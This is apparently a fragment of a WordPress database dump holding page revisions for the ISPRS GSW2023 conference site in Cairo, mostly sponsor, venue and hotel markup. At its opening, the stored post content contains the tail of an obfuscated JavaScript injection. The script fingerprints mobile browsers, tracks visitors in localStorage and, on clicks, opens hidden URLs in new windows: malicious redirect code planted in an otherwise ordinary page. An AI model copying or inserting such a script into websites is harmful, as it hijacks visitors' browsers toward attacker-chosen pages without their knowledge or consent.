)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-09-04 12:50:04','2023-09-04 12:50:04','',3066,'https://gsw2023.com/?p=5453',0,'revision','',0),
(5454,1,'2023-09-04 12:57:22','2023-09-04 12:57:22','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"]<p><a href=\"https://www.esri.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/09/\" alt=\"\" width=\"487\" height=\"180\" /></a>ISPRS GSW2023 Best Workshop Paper Award</p>\r\n[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://geomatex.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/32596kmnqz.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n<p style=\"text-align: center;\"><a href=\"https://gsw2023.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/08/mgeo.jpg\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" 